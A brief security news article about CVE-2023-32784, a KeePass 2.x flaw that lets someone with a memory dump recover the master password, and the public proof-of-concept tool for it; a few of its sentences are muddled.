HQ/EMEAFind out how we can help your business
KeePass, an open-source password manager, has shown a vulnerability within its coding that could allow an unauthenticated individual to recover the master password from a software’s memory.
There is now a publicly available proof-of-concept tool despite the lack of a fix for the vulnerability. However, exploiting the flaw could not remotely extract the Password.
The researchers explained that if malware has already infected the computer and obtained admin privileges, it does not necessarily mean the infection could impact a user. In addition, it could be worse if a user suspects someone could get computer access and conduct forensic analysis.
The worst thing that could occur is that the master password will be recovered by unauthorised individuals, despite locking or stopping KeePass.
The KeePass vulnerability in question is CVE-2023-32784.
According to investigations, the KeePass flaw, CVE-2023-32784, impacts SecureTextBoxEx. This software’s custom text box could allow users to access the master password and other passwords during editing.
A user should swap files, hibernate files, or dump the RAM of the entire system to leverage the PoC tool. An individual could exploit the flaw by generating a leftover string in memory for every character input. The attack could be lethal since it is nearly impossible to get rid of the string once generated since it is how a dotnet operates.
The PoC explained that when a user types ‘Password,’ it will result in leftover strings. Next, the PoC app searches the dump for the string patterns and offers a possible password character for each position in the Password.
The KeePass admins assured everyone that they would work on a fix to address the flaw. Furthermore, the vulnerability could also affect KeePass 2[.]X branch for Windows and possibly macOS and Linux. Fortunately, the patch for the current vulnerability could roll out by July this year.
The concerning part of this flaw is that a PoC tool is already available to the public with no patch in sight. Experts claim that the exploitation of CVE-2023-32784 is low, but it is still possible for other miscreants to experiment and create an attack that could profit from the flaw.
